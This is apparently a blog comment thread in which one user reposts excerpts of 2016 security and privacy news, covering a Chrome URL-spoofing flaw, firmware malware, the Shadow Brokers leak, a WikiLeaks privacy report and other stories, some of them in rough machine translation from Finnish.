Pakistan-based researcher Rafay Baloch discovered that the address bar in Google Chrome, also known as the omnibox, can be tricked into flipping URLs.
The problem, which affects Chrome for Android, is related to how Arabic and Hebrew text is written from right to left (RTL).
“The IP address part can be easily hided specially on mobile browsers by selecting a long URL (google.com/fakepath/fakepath/fakepath/… /127.0.0.1) in order to make the attack look more realistic,” Baloch explained in a blog post. “In order to make the attack more realistic unicode version of padlock can be used in order to demonstrate the presence of SSL.”
A similar vulnerability was also found in Firefox for Android (CVE-2016-5267).
Tomi Engdahl says:
How Secret Service Techniques Improve Cybersecurity
http://www.securityweek.com/how-secret-service-techniques-improve-cybersecurity
Recent news coverage has not been kind to the Secret Service, but when it comes to the organization’s core mission – protecting the President – it is hard to argue with its record.
In the 110 years since the Secret Service began protecting the President, only seven assailants have actually reached their target, and only one has accomplished his goal.
Here are four lessons that cybersecurity defenders can learn from the Secret Service:
1. You can’t protect what you can’t see
The first step to securing any location is to identify likely paths of attack. But even today, most cybersecurity defenses are based on the equivalent of a network map drawn from memory on the back of a napkin.
Virtually every major intrusion in recent years has relied on the attackers having a better understanding the target network than its defender did.
2. Visibility alone isn’t enough – you must reduce your attack surface
Every environment has many attack paths, and monitoring all of them would strain available resources beyond capacity. But by limiting the pathways to the President, the Secret Service reduces risk and can concentrate its resources where they will be most effective.
regularly analyzes data centers and cloud environments to help organizations identify and shut down their attack surface. We’ve found that even data centers with as few as 100 servers regularly have hundreds of thousands of open, port-to-port communications pathways between servers. Monitoring so many pathways risks burying defenders in alerts and false positives
3. Prioritize your security
By limiting the number of attack paths, the ones that pose the greatest risk quickly become obvious. The Secret Service places its valuable resources – agents, surveillance cameras – at the most important intersections and pathways.
Many cybersecurity defenders still try to protect the interior of their data center as if every server is equally important. If you don’t visualize your data center and take steps to reduce your attack surface, you have no choice but to do this.
Just as simplifying its environment enables the Secret Service to protect it better, simplifying the communications paths between your servers means you can quickly identify the riskiest points in your data center and use all your other security tools – honeynets, intrusion detection systems, behavioral analytics, hunt – more effectively.
4. Focus on security consequences for your most valuable assets
Cybersecurity defenders still frequently think of any intrusion into their data center as a failure. But statistics increasingly demonstrate that stopping all intruders at the perimeter is impossible – one recent study found that 75 percent of organizations had been breached at least once during 2015. The Secret Service understands this challenge, because they never rely on only a single layer of defense.
Intruders have two goals: gathering information about a target environment, and exploiting that information to cause damage to a high-value asset. Instead of focusing on the perimeter as being the most important defense, we should reorient ourselves to think of the “ringfence” we draw around our high-value assets as our highest wall.
Tomi Engdahl says:
Firmware, Controllers, and BIOS: Subterranean Malware Blues
http://www.securityweek.com/firmware-controllers-and-bios-subterranean-malware-blues
The Basic Input/Output System (BIOS) in our laptop, the hardware controller that runs the disk, and the Baseboard Management Controller (BMC) in our servers are all little computers that sit below the operating system and in some cases can act independently of the core CPU itself. These are the backdoors into the computer that if compromised, can subvert everything that we know from the operating system.
To the BIOS and beyond
owever, as attackers have increased in sophistication, they realized they can get lower than the operating system itself, by going to the BIOS.
The BIOS is an ideal location for malware, because not only is it ignored by most AV products, it remains untouched even when the operating system is wiped and reinstalled.
The little computer that runs your hard drive
If an attacker was able to compromise the firmware of the disk controller, then he could control the disk in ways even the operating system would be blind to. Early last year attackers were discovered that were doing just that.
The hardwired backdoor into your data center
Baseboard Management Controller does play a critically important role in servers. For server hardware, the BMC is quite literally the “computer-within-the-computer,” with its own processor, memory, and networking stack. Being independent of the main server hardware, it is even lower than the BIOS. It has the all-important job of monitoring and managing the fundamental health of the system such as internal temperature, fan speeds, and the operating system itself.
Intelligent Platform Management Interface (IPMI) comes into play
IPMI is a protocol that administrators use for remote out-of-band server management. Each hardware vendor has its own branded version of IPMI, but they are largely equivalent.
The danger of IPMI is tied to its power. IPMI can be used to mount virtually any disk image, and replace the operating system if necessary. To do so, IPMI and the BMC work even when the main server processors aren’t running, or even when the server is powered down. The only way to disable it completely is to physically unplug the server from power.
While IPMI offers god-like power over the server, it is typically not very well-secured or monitored. Default passwords are well-known, all too often used, and IPMI access is rarely logged.
one of the biggest vulnerabilities lies in the physical hardware itself. This is true not just in the data center, but in our laptops as well.
Tomi Engdahl says:
What Your Security Team Can Learn From the Olympics
http://www.securityweek.com/what-your-security-team-can-learn-olympics
The Olympics are such an inspirational time of year. Extraordinary athletes from around the world gather to attempt a lifelong goal of achieving Olympic gold, often the culmination of years or decades of tireless training and dedication.
While watching some of these world-class athletes at the top of their game over the past few weeks, I started to think about the field of security, and what important lessons could be learned by considering how Olympians got to where they are. With that in mind, I came up with a few takeaways for how security teams can work together to reach cybersecurity gold.
Bring your individual strengths. Not every security practitioner has the same skill set, just as not every athlete plays the same position.
Remain dedicated to your craft. Athletes train for years, even decades, to make it to the Olympics. Likewise, security professionals need to remain up-to-date on current trends, threats and technologies so they are staying ahead of the bad guys.
Consult your playbook. In sports, preparation is key.
Adjust your tactics. Having a playbook is incredibly important to best prepare yourself for whatever conflict comes your way, either on the field or in your network. But nothing prepares you for the actual moment of attack.
Listen to your coach. While athletes are hard at work on their individual tasks, it’s up to the coach to consider the bigger picture and how best to bring the team together to benefit the whole. Similarly, the CSO or CISO needs to be able to lead their team and consider the impact they will have on the broader organization.
Tomi Engdahl says:
Bitcoin.org Warns of Possible State-Sponsored Attacks
http://www.securityweek.com/bitcoinorg-warns-possible-state-sponsored-attacks
Bitcoin.org, the organization that oversees the development of the Bitcoin software, has warned users that state-sponsored attackers will likely target the upcoming release.
Bitcoin Core, the open source client for Bitcoin, validates the blockchain and all transactions. Bitcoin Core 0.12.1 was released in April and developers will soon make available version 0.13.0.
In a security notice published on Wednesday, Bitcoin.org said it has reason to believe that the Bitcoin Core 0.13.0 binaries will be targeted by state-sponsored threat actors. Users have been provided an encryption key that can help verify the legitimacy of Bitcoin Core binaries.
“We ask the Bitcoin community, and in particular the Chinese Bitcoin community to be extra vigilant when downloading binaries from our website,”
Tomi Engdahl says:
Firewall Vendors Analyze Exploits Leaked by “Shadow Brokers”
http://www.securityweek.com/firewall-vendors-analyze-exploits-leaked-shadow-brokers
Cisco, Fortinet and WatchGuard have analyzed the exploits leaked recently by a threat group calling itself Shadow Brokers. While Fortinet and WatchGuard determined that the vulnerabilities were patched several years ago, Cisco did find a zero-day in its products.
The mysterious Shadow Brokers group claims to have hacked The Equation Group, a threat actor believed to be associated with the U.S. National Security Agency (NSA). Shadow Brokers, which some speculate might be sponsored by Russia, has released 300Mb of firewall exploits, implants and tools, and is offering to sell even more information for 1 million Bitcoin (valued at more than $500 million).
Kaspersky Lab, which has conducted an extensive analysis of Equation Group tools, has confirmed that the leaked files appear to come from the NSA-linked actor, but pointed out that the files date back to 2010-2013. Nevertheless, this is still a significant leak.
Shadow Brokers has published exploits and implants for hacking firewalls made by Fortinet, Chinese company TOPSEC, Cisco, Juniper Networks, WatchGuard and several unknown vendors.
Tomi Engdahl says:
Organizations in 30 Countries Targeted in “Operation Ghoul”
http://www.securityweek.com/organizations-30-countries-targeted-operation-ghoul
Industrial, engineering and other types of organizations from around the world have been targeted in a profit-driven campaign dubbed by Kaspersky Lab “Operation Ghoul.”
The threat group, whose activities have been traced back to March 2015, has been trying to make money by hijacking bank accounts and stealing intellectual property that they can sell to interested parties. The cybercrime gang has targeted more than 130 organizations in over 30 countries.
According to the security firm, Operation Ghoul attacks start with a malicious email coming from a spoofed address that appears to belong to a bank. The emails typically carry a file attachment or contain links that point to phishing websites. The fake messages are mostly sent to executives, managers and other employees that could have access to valuable information.
Tomi Engdahl says:
Report Shows Few Solutions to Filling Cyber Skills Gap
http://www.securityweek.com/report-shows-few-solutions-filling-cyber-skills-gap
A new report on the cyber security skills shortage from Kaspersky Lab provides few new insights and no new solutions to the problem — but it does prompt an important question. It confirms that organizations are seeking to increase their security headcount and it confirms the shortage of new security talent to enable this; but it doesn’t offer any real solution.
Nevertheless, the report titled ‘Lack of security talent: an unexpected threat to corporate cybersafety’ is not without merit. One point it makes very well is the counter-productivity of relying on third-parties to solve any post-event problem. It notes that companies “that feel confident about their IT Security team” pay between $100,000 and $500,000 to recover from a single breach. However, those with less confidence “end up paying from $1.2 to $1.47 million.”
A significant portion of the extra cost comes from hiring new staff ‘to pick up the pieces’, “with companies spending more on hiring external experts and paying overtime for their own team, than they actually lose in terms of business opportunities, credit rating and compensations to clients and partners.” Sadly, this is not a solution to the skills gap, but rather another consequence of it.
“Even for junior positions, we have to find people with practical skills and knowledge of various aspects of IT. We demand knowledge of specific tools like debugging and reverse engineering software, experience with various programming languages,” says Kirill Shiryaev, Kaspersky Lab’s Head of Talent Acquisition. Technical expertise first and foremost; but it still requires 40 applicants to fill one position, he says.
Lack of security talent: an unexpected threat to corporate cybersafety
IT Security Risks Special Report Series 2016
https://business.kaspersky.com/security_risks_report_lack_of_security_talent/
Tomi Engdahl says:
Backdoor Abuses TeamViewer to Spy on Victims
http://www.securityweek.com/backdoor-abuses-teamviewer-spy-victims
A recently spotted backdoor Trojan abuses the legitimate TeamViewer remote access tool to spy on victims, Doctor Web security researchers warn.
Malware that leverages the popular remote control utility for nefarious purposes isn’t unheard of, but it seems that cybercriminals are constantly searching for new ways to abuse it. Dubbed BackDoor.TeamViewerENT.1 and distributed under the name Spy-Agent, the Trojan installs legitimate TeamViewer components on the compromised machines to spy on its victims.
Tomi Engdahl says:
Dispatches from DEFCON 24
http://www.securityweek.com/dispatches-defcon-24
Dispatches from Black Hat USA 2016
http://www.securityweek.com/dispatches-black-hat-usa-2016
Tomi Engdahl says:
F-Secure commercialize quick-service sides of the Riddler.
According to F-Secure already been in use for more than a year’s internet-connected computers Meddling Riddler service has been a well kept secret.
Security company F-Secure has been made and partially released for free use of the tool Riddler called, which is available on the Internet at riddler.io . The site has been in public for 15 months, but the company has so far kept it more or less hidden.
The service is limited for anyone to use. By registering, you will receive in sight at 10, and registered users of Search Results 20 results, which can be made on the basis of, for example, verkkodomainien, operating systems, or the destination country.
Anyone can see Riddler 10-20 results of what your own web domain looks outward.
- It is not a port scan. This is not a direct attack tool. Knowledge itself is already in the public domain, this will bring it visible on a larger scale, explains Janne Pirttilahti
The openings will find a Riddler should be combined with program code that would make the self-attack.
FICORA’s information security expert Sami Orasaari Riddler should not be a problem.
- It is comparable to Google, with the difference that it will collect the content rather than information about the system. This information is public, that is, I do not see the problem, Orasaari says.
Orasaari raise as a control Shodan search engine , which searches for network connected systems.
- There is more transparent when the information becomes available to all, says Orasaari.
F-Secure’s plans include the commercialization of the service in the near future. Pirttilahti not want to talk yet pricing model, but he says the service side of the incoming instant plenty more features.
- For example, alarms. If a new device appears in the domain, it can be sent to the customer notification.
Pirttilahti also stresses that the service will not be sold to anyone. The buyer may be, for example, the lawful errand or company security researcher. However, the functionality of the service does not have the limitations of these views, but the user gets views over the entire Internet.
- We will ensure that the customer is a company or researcher who says he is.
However, Pirttilahti admits that the ultimate mode of operation is about left to user Technically, the company can use technology to view its competitors.
Sources:
http://www.digitoday.fi/tietoturva/2016/08/18/f-secure-alkaa-myyda-keskustelua-herattanytta-nettinuuskijansa/20168604/66?rss=6
http://www.digitoday.fi/tietoturva/2016/06/10/f-secure-teki–ja-antoi-vapaaseen-kayttoon–hurjan-nuuskintatyokalun/20166253/66
Tomi Engdahl says:
Password strength meters promote piss-poor paswords
You had one job …
http://www.theregister.co.uk/2016/08/19/strength_metres_excel_at_promoting_the_worlds_weakest_passwords/
Password strength meters used during web sites’ signup process remain incapable of doing their job, says Compound Eye developer Mark Stockley.
Indeed, a majority of security experts consider the tools a useless control that grant little more than an illusion of protection.
“You can’t trust password strength meters on websites,” Stockley says.
“The passwords I used in the test are all, deliberately, absolutely dreadful … they’re chosen from a list of the 10,000 most common passwords and have characteristics I thought the password strength meters might overrate.”
Tomi Engdahl says:
Twitter Says It Suspended 360,000 Suspected Terrorist Accounts in a Year
https://www.wired.com/2016/08/twitter-says-suspended-360000-suspected-terrorist-accounts-year/
Twitter is still actively combating terrorism on its platform, and it wants you to know so. Really and truly, the company says, it is making progress.
For Twitter, fighting terrorism on its platform is a particularly sensitive problem. While Facebook has taken a hardline stance on terrorism and removes any and all posts that carry even a trace of suspicious content, Twitter has continually attempted to strike a balance between protecting free speech and cracking down on players who use its service as a way to promote violence or threats. As a recent WIRED feature reported, Twitter is often still the “main engine” for ISIS propagandists to promote their cause and find new recruits.
Tomi Engdahl says:
Germany to tell people to stockpile food and water in case of attacks: FAS
http://www.reuters.com/article/us-germany-security-stockpiling-idUSKCN10W0MJ
For the first time since the end of the Cold War, the German government plans to tell citizens to stockpile food and water in case of an attack or catastrophe, the Frankfurter Allgemeine Sonntagszeitung newspaper reported on Sunday.
Germany is currently on high alert after two Islamist attacks and a shooting rampage by a mentally unstable teenager last month. Berlin announced measures earlier this month to spend considerably more on its police and security forces and to create a special unit to counter cyber crime and terrorism.
“The population will be obliged to hold an individual supply of food for ten days,” the newspaper quoted the government’s “Concept for Civil Defence” – which has been prepared by the Interior Ministry – as saying.
The paper said a parliamentary committee had originally commissioned the civil defense strategy in 2012.
People will be required to stockpile enough drinking water to last for five days, according to the plan, the paper said.
Tomi Engdahl says:
Mitch Prothero / BuzzFeed:
Belgian officials asked NSA for help in snooping on bulk cellphone metadata from a terrorist’s funeral, which helped in catching Paris attacker Salah Abdeslam
Belgium Called In The NSA To Help Catch Paris Attacker
https://www.buzzfeed.com/mitchprothero/belgium-called-in-the-nsa-to-help-catch-paris-attacker?utm_term=.ao0MQPpzJ5#.cggQ5WGDJO
A breakthrough in the four-month-long manhunt for key suspect in the Paris attacks only came when Belgian officials asked the NSA for assistance, two investigators told BuzzFeed News. Read the full story here.
https://www.buzzfeed.com/mitchprothero/why-europe-cant-find-the-jihadis-in-its-midst
Tomi Engdahl says:
Tony Romm / Politico:
Tech giants and rights groups urge the Department of Homeland Security to scrap proposal asking US visitors for their social media accounts
Tech slams Homeland Security on social media screening
http://www.politico.com/story/2016/08/social-media-screening-privacy-227287
Internet giants including Google, Facebook and Twitter slammed the Obama administration on Monday for a proposal that would seek to weed out security threats by asking foreign visitors about their social media accounts.
The Department of Homeland Security for months has weighed whether to prompt foreign travelers arriving on visa waivers to disclose the social media websites they use — and their usernames for those accounts — as it seeks new ways to spot potential terrorist sympathizers.
Read more: http://www.politico.com/story/2016/08/social-media-screening-privacy-
Tomi Engdahl says:
WikiLeaks exposed sensitive data on hundreds of innocent people, including rape victims
http://www.theverge.com/2016/8/23/12601444/wikileaks-personal-data-exposed-rape-victims-saudi-arabia
AP report adds to growing concerns over how transparency group handles sensitive information
WikiLeaks has exposed the personal data on hundreds of ordinary citizens, including rape victims, sick children, and the mentally ill, according to a report published today by the Associated Press. In its analysis, the AP found that the transparency group published medical files on “scores” of innocent people, and that it “routinely” publishes other sensitive information that can be exploited by criminals, including identity records and phone numbers.
WikiLeaks has long committed itself to exposing government secrets through the publication of diplomatic cables and other classified information. But the organization has come under increased criticism for the way it handles personal data, after it published emails sent by Turkey’s ruling AKP party and the Democratic National Committee (DNC) in July. In the DNC leak, WikiLeaks did not redact social security numbers and credit card information, and it faced criticism for publishing a “special database” on nearly every female Turkish voter as part of the AKP leak. (Links to the database were later removed.)
The AP reports that WikiLeaks’ growing collection of documents includes viruses and spam in addition to sensitive information on innocent people.
Private information on hundreds of people including rape victims exposed on WikiLeaks’ website
http://www.itv.com/news/2016-08-23/private-information-on-hundreds-of-people-including-rape-victims-exposed-on-wikileaks-website/
An investigation by the Associated Press (AP) has found that in the last year the radical transparency group has published medical files belonging to scores of ordinary people, while hundreds of others have had sensitive family, financial, or identity records posted online.
Private lives are exposed as WikiLeaks spills its secrets
http://bigstory.ap.org/article/b70da83fd111496dbdf015acbb7987fb/private-lives-are-exposed-wikileaks-spills-its-secrets?utm_campaign=SocialFlow&utm_source=Twitter&utm_medium=AP
WikiLeaks’ global crusade to expose government secrets is causing collateral damage to the privacy of hundreds of innocent people, including survivors of sexual abuse, sick children and the mentally ill, The Associated Press has found.
In the past year alone, the radical transparency group has published medical files belonging to scores of ordinary citizens while many hundreds more have had sensitive family, financial or identity records posted to the web. In two particularly egregious cases, WikiLeaks named teenage rape victims. In a third case, the site published the name of a Saudi citizen arrested for being gay, an extraordinary move given that homosexuality is punishable by death in the ultraconservative Muslim kingdom.
“They published everything: my phone, address, name, details,”
Attempts to reach WikiLeaks founder Julian Assange were unsuccessful; a set of questions left with his site wasn’t immediately answered Tuesday. WikiLeaks’ stated mission is to bring censored or restricted material “involving war, spying and corruption” into the public eye, describing the trove amassed thus far as a “giant library of the world’s most persecuted documents.”
The library is growing quickly, with half a million files from the U.S. Democratic National Committee, Turkey’s governing party and the Saudi Foreign Ministry added in the last year or so. But the library is also filling with rogue data, including computer viruses, spam, and a compendium of personal records.
Scott Long, an LGBT rights activist who has worked in the Middle East, said the names of rape victims were off-limits. And he worried that releasing the names of people persecuted for their sexuality only risked magnifying the harm caused by oppressive officials.
“You’re legitimizing their surveillance, not combating it,” Long said.
Dietrich, the transparency activist, said he still supported WikiLeaks “in principle” but had been souring on Assange and his colleagues for a while.
“One of the labels that they really don’t like is being called ‘anti-privacy activists,’” Dietrich said in a phone interview. “But if you want to live down that label, don’t do stuff like this!”
Tomi Engdahl says:
China Launches First-ever Quantum Communication Satellite
http://english.cas.cn/head/201608/t20160816_166483.shtml
In a cloud of thick smoke, the satellite, Quantum Experiments at Space Scale (QUESS), roared into the dark sky on top of a Long March-2D rocket.
The 600-plus-kilogram satellite will circle the Earth once every 90 minutes after it enters a sun-synchronous orbit at an altitude of 500 kilometers.
In its two-year mission, QUESS is designed to establish “hack-proof” quantum communications by transmitting uncrackable keys from space to the ground, and provide insights into the strangest phenomenon in quantum physics — quantum entanglement.
Quantum communication boasts ultra-high security as a quantum photon can neither be separated nor duplicated. It is hence impossible to wiretap, intercept or crack the information transmitted through it.
With the help of the new satellite, scientists will be able to test quantum key distribution between the satellite and ground stations, and conduct secure quantum communications between Beijing and Xinjiang’s Urumqi.
QUESS, as planned, will also beam entangled photons to two earth stations, 1,200 kilometers apart, in a move to test quantum entanglement over a greater distance, as well as test quantum teleportation between a ground station in Ali, Tibet, and itself.
SPOOKY & ENTANGLED
Scientists found that when two entangled particles are separated, one particle can somehow affect the action of the far-off twin at a speed faster than light.
Scientists liken it to two pieces of paper that are distant from each other: if you write on one, the other immediately shows your writing.
In the quantum entanglement theory, this bizarre connection can happen even when the two particles are separated by the galaxy.
By harnessing quantum entanglement, the quantum key technology is used in quantum communications, ruling out the possibility of wiretapping and perfectly securing the communication.
A quantum key is formed by a string of random numbers generated between two communicating users to encode information. Once intercepted or measured, the quantum state of the key will change, and the information being intercepted will self-destruct.
Tomi Engdahl says:
Kaspersky launches its own OS on Russian routers
Four-year build results in OS that aims to secure industrial control systems, мы думаем
http://www.theregister.co.uk/2016/08/23/kasperskyos/
Kaspersky Labs has finished building its eponymously-named operating system after four years of quiet development.
Little information about the OS has made it onto the English-speaking side of the internet. Kaspersky Labs Russia told Vulture South to wait a few weeks for the English press release for information.
What we do know is that in 2012 ebullient Kaspersky Lab chief executive officer Eugene Kaspersky described the OS as a ground-up build to help protect industrial control systems.
A more detailed paper published at the time revealed it would be designed to help protect infrastructure like power stations, electricity grids, and telecommunications networks.
The paper described the need to protect industrial control systems with a ground-up built operating system and outlined the following design criteria:
The operating system cannot be based on existing computer code; therefore, it must be written from scratch.
To achieve a guarantee of security it must contain no mistakes or vulnerabilities whatsoever in the kernel, which controls the rest of the modules of the system. As a result, the core must be 100 percent verified as not permitting vulnerabilities or dual-purpose code.
For the same reason, the kernel needs to contain a very bare minimum of code, and that means that the maximum possible quantity of code, including drivers, needs to be controlled by the core and be executed with low-level access rights.
In such an environment there needs to be a powerful and reliable system of protection that supports different models of security.
It appears the operating system has been deployed in routers manufactured by Russian outfit Kraftway, a company that seems to sell into various industrial control system markets, and verticals including government, healthcare, and education.
It has been compared to Cisco’s IOS and Huawei’s VRP operating systems.
Securing Critical Information Infrastructure: Trusted Computing Base
https://securelist.com/analysis/publications/36594/securing-critical-information-infrastructure-trusted-computing-base/
Tomi Engdahl says:
FBI Finds 14,900 More Documents From Hillary Clinton’s Email Server
https://news.slashdot.org/story/16/08/22/2034212/fbi-finds-14900-more-documents-from-hillary-clintons-email-server
The FBI uncovered nearly 15,000 more emails and materials sent to or from Hillary Clinton as part of the agency’s investigation into her use of private email at the State Department. The documents were not among the 30,000 work-related emails turned over to the State Department by her attorneys in December 2014. The State Department confirmed it has received “tens of thousands” of personal and work-related email materials — including the 14,900 emails found by the FBI — that it will review.
FBI Found 15,000 More Clinton Emails
http://abcnews.go.com/Politics/fbi-found-15000-clinton-emails/story?id=41576112
“We found those additional emails in a variety of ways,” Comey explained in July. “Some had been deleted over the years, and we found traces of them on devices that supported or were connected to the private e-mail domain. Others we found by reviewing the archived government e-mail accounts of people who had been government employees at the same time as Secretary Clinton … Still others we recovered from the laborious review of the millions of email fragments dumped into the slack space of the server decommissioned in 2013.”
The first group of 14,900 emails was ordered released, and a status hearing on Sept. 23 “will determine the release of the new emails and documents,” Boasberg said.
Tomi Engdahl says:
Turkish Journalist Jailed For Terrorism Was Framed, Forensic Report Shows
https://hardware.slashdot.org/story/16/08/22/2220251/turkish-journalist-jailed-for-terrorism-was-framed-forensic-report-shows
Turkish investigative journalist Baris Pehlivan spent 19 months in jail, accused of terrorism based on documents found on his work computer. But when digital forensics experts examined his PC, they discovered that those files were put there by someone who removed the hard drive from the case, copied the documents, and then reinstalled the hard drive.
Turkish Journalist Jailed for Terrorism Was Framed, Forensics Report Shows
http://motherboard.vice.com/read/turkish-journalist-jailed-for-terrorism-was-framed-forensic-report-shows-1
Tomi Engdahl says:
Intruders Use Virtual Machines on Infected PCs to Hide Their Actions
SecureWorks observes new technique used by threat actors
http://news.softpedia.com/news/intruders-use-virtual-machines-on-infected-pcs-to-hide-their-actions-507550.shtml
SecureWorks reports on a new tactic used by threat actors, who are now attempting to install and run a virtual machine, with the purpose of hiding their malicious actions.
For the non-connoisseur, virtual machines are emulated file systems, most of the times complete with a fully-running operating system that runs inside your existing operating system. In layman’s terms is an OS inside your OS, allowing users to start Linux or Windows 98 just by clicking an icon on their desktop.
Virtual machines are generally used by software developers to test products and are often embedded in other applications, such as some security software.
“The adversary had achieved a level of access that allowed them to interact with the Windows Explorer shell via the Terminal Services Client,” SecureWorks Counter Threat Unit (CTU) researchers noted.
“Figure 1 shows the threat actor using the Microsoft Management Console (MMC) to launch the Hyper-V Manager, which is used to manage Microsoft’s virtual machine (VM) infrastructure,” the team added.
“VMs can hide malicious actions from security products”
The intruder tried to start a virtual machine on the infected host. Fortunately for the compromised company, the machine the intruder managed to gain access was a virtual machine itself, and virtual machines can’t be nested inside each other.
The attacker failed in his attempt, but this shows a new tactic threat actors are now using to hide their activity on hacked systems.
Virtual Machines Used to Hide Activity?
Adversaries could use virtual machines to remove evidence of activity
https://www.secureworks.com/blog/virtual-machines-used-to-hide-activity
Tomi Engdahl says:
Crims share vulns but vendors don’t. This needs fixing
Centrify’s strategy man says attack re-use is an opportunity for better security
http://www.theregister.co.uk/2016/08/23/david_mcneely_vendors_still_shy_on_vuln_sharing/
Attackers like to re-use code, but vendors don’t find out because they don’t share, according to Centrify’s David McNeely.
In Sydney for Gartner’s Security and Risk Management Summit, McNeely – the company’s veep of product strategy – said that realisation was driven home to him during the recent Black Hat conference in Las Vegas.
Just like anybody working with software, black-hats prefer the tried-and-true to creating something new.
This year’s point-of-sale horrors are a good example: “Attackers tend to re-use their technologies,” McNeely said. “If they work out something in a point-of-sale system, they try it again and again.
“The industry needs to share information about what happens, how the attack worked, how to prevent it.”
That means overcoming the all-too-common shyness and shame: vendors dislike being “outed”, dislike outing themselves even more, and are fearful of going public in case knowledge enables more attacks.
“People are shy about how they secure things, in case they give away too much information about how a breach happened,” he added.
Tomi Engdahl says:
US Customs and Border Protection Wants To Know Who You Are On Twitter
https://news.slashdot.org/story/16/08/23/062214/us-customs-and-border-protection-wants-to-know-who-you-are-on-twitter
U.S. border control agents want to gather Facebook and Twitter identities from visitors from around the world. But this flawed plan would violate travelers’ privacy, and would have a wide-ranging impact on freedom of expression — all while doing little or nothing to protect Americans from terrorism.
A proposal has been issued by U.S. Customs and Border Protection to collect social media handles from visitors to the United States from visa waiver countries.
this plan “would unfairly violate the privacy of innocent travelers,” would cause “innocent travelers” to “engage in self-censorship, cutting back on their online activity out of fear of being wrongly judged by the U.S. government,” and would lead to a “slippery slope, where CBP would require U.S. citizens and residents returning home to disclose their social media handles, or subject both foreign visitors and U.S. persons to invasive device searches at ports of entry with the intent of easily accessing any and all cloud data.”
U.S. Customs and Border Protection Wants to Know Who You Are on Twitter—But It’s a Flawed Plan
https://www.eff.org/deeplinks/2016/08/us-customs-and-border-protection-wants-know-who-you-are-twitter-its-flawed-plan
U.S. border control agents want to gather Facebook and Twitter identities from visitors from around the world. But this flawed plan would violate travelers’ privacy, and would have a wide-ranging impact on freedom of expression—all while doing little or nothing to protect Americans from terrorism.
CBP specifically seeks “information associated with your online presence—Provider/Platform—Social media identifier” in order to provide DHS “greater clarity and visibility to possible nefarious activity and connections” for “vetting purposes.”
In our comments, we argue that would-be terrorists are unlikely to disclose social media identifiers that reveal publicly available posts expressing support for terrorism.
But this plan would be more than just ineffective. It’s vague and overbroad, and would unfairly violate the privacy of innocent travelers. Sharing your social media account information often means sharing political leanings, religious affiliations, reading habits, purchase histories, dating preferences, and sexual orientations, among many other personal details.
Tomi Engdahl says:
Turkish Journalist Jailed for Terrorism Was Framed, Forensics Report Shows
https://motherboard.vice.com/read/turkish-journalist-jailed-for-terrorism-was-framed-forensic-report-shows-1
Turkish investigative journalist Barış Pehlivan spent 19 months in jail, accused of terrorism based on documents found on his work computer. But when digital forensics experts examined his PC, they discovered that those files were put there by someone who removed the hard drive from the case, copied the documents, and then reinstalled the hard drive.
The attackers also attempted to control the journalist’s machine remotely, trying to infect it using malicious email attachments and thumb drives. Among the viruses detected in his computer was an extremely rare trojan called Ahtapot, in one of the only times it’s been seen in the wild.
“We have never seen a computer attacked as ferociously as Barış’s. The attackers seemed to pull everything out of their bag of tricks,” Mark Spencer, digital forensics expert at Arsenal Consulting, said.
Pehlivan went to jail in February of 2011, along with six of his colleagues, after electronic evidence seized during a police raid in 2011 appeared to connect all of them to Ergenekon, an alleged armed group accused of terrorism in Turkey.
It is not clear who perpetrated the attack
Tomi Engdahl says:
Virtualization benefits for manufacturers
http://www.controleng.com/single-article/virtualization-benefits-for-manufacturers/daa91a8399bc7c1a2c562af26f46595f.html?OCVALIDATE&ocid=101781
Virtualization growth in manufacturing is continuing as more end users are taking advantage of the cost benefits it offers such as increased efficiency, reduced costs, and better security.
The goal is to the keep the network up and running by eliminating any unplanned downtime, so that is where network monitoring comes into play as a strong tool to alert and keep end users aware of nuances and changes going on in a network. In short, increase network visibility.
Virtualization is growing in all industries, especially manufacturing
From a hardware perspective, virtualization makes it possible to run more applications on the same hardware, which translates into cost savings. If less servers are purchased, then there will be fewer capital expenditures and maintenance costs.
Virtual machines can end up centrally managed and monitored, which allows a manufacturer to more easily achieve greater process consistency across the enterprise. Benefits include ease of continuous process improvement, greater agility and less training burden as employees transfer, or leave the company, get promoted, or retire.
By separating software from hardware updates, a virtual IT environment might offer benefits to ease this management lifecycle of software and OS system updates. Hardware purchases can also occur on a regular or scheduled basis, resulting in greater consistency in system specifications.
Virtualization provides greater cost savings
As mentioned, virtualization is growing on the industrial, or OT, side. Automation’s gains over the past decade have come from the ability to connect business systems to the plant floor and drive factories based on orders received and collect data out of the plant and use that to analyze and improve performance. Knowing and understanding all that, end users are deriving great cost savings by virtualizing PCs onto fewer physical servers.
When doing that, the top benefit is cost savings and another benefit is manufacturers are protecting themselves against hardware failure.
The issue is all about knowing the network and understanding what is going on. That all can happen once the user develops a baseline of what the network should look like. Then they can find and determine discrepancies.
Defense-in-depth tool
Whether it is a virtual environment or a regular physical network, in today’s Internet-connected manufacturing environment, network monitoring becomes another strong tool in solid defense in depth program.
From a security perspective, the goal is to ensure the network stays up as much as possible, which minimizes downtime and maximizes operational return.
The biggest risk on a network is when something that impacts the business such as a distributed denial of service (DDoS) attack or when someone is trying to find an exploit and are running scanners across the network. By monitoring NetFlow traffic, it is possible to report on unusual activity on unknown ports and provide that information in real time as it is happening. NetFlow is a feature on Cisco routers that provides the ability to collect IP network traffic as it enters or exits an interface.
Because it is possible to report on things connected or disconnected on the network, if there are critical connections on the network that go down which are mission critical, the network monitoring tool can immediately alert the user the second the tool receives an outage notice from a device. The tool can inform the administrator of a fault before they realize it has happened on the network.
OT growth coming
Network monitoring has been a staple in the IT industry for a decade or so and the manufacturing automation industry is just now starting to pick up on the benefits that visibility bring.
OT networks tend to be a lot smaller than IT networks, but that is in the process of changing, especially with the looming shift to the Industrial Internet of Things (IIoT). When that happens, and there are industry pundits saying it will happen en masse sooner than later, the number of network connected devices is absolutely going to mushroom. So most likely in two years, network monitoring will be as important in this industry as it already is in IT.
Tomi Engdahl says:
Dating site and off-murky practices are revealed: false promises and illegal billing
A giant compromised in 2015 had Ashley Madison cheating web site is caught in the false promises of security and the adoption of the unauthorized retention of users’ information. The matter is investigated by the authorities, as well as in Canada and Australia.
one incident in the last year leaked messages revealed 36 million people in the user information including names, credit card numbers, and in some cases sexual fantasies.
The site had already been before last year’s breakthrough medal icon, which declared a trusted security certificate for the site to have. Ashley Madison administrators have had time to remove the coin site after recognizing that it was a fake.
In addition to trumped-up security ratings authorities considered unsuitable for the way in which Ashley Madison handles user data.
Source: http://www.tivi.fi/Kaikki_uutiset/murretun-deittisivuston-hamarat-kaytannot-paljastuvat-perattomia-lupauksia-ja-laitonta-laskuttamista-6576350
Tomi Engdahl says:
FBI Investigating Russian Hack Of New York Times Reporters, Others
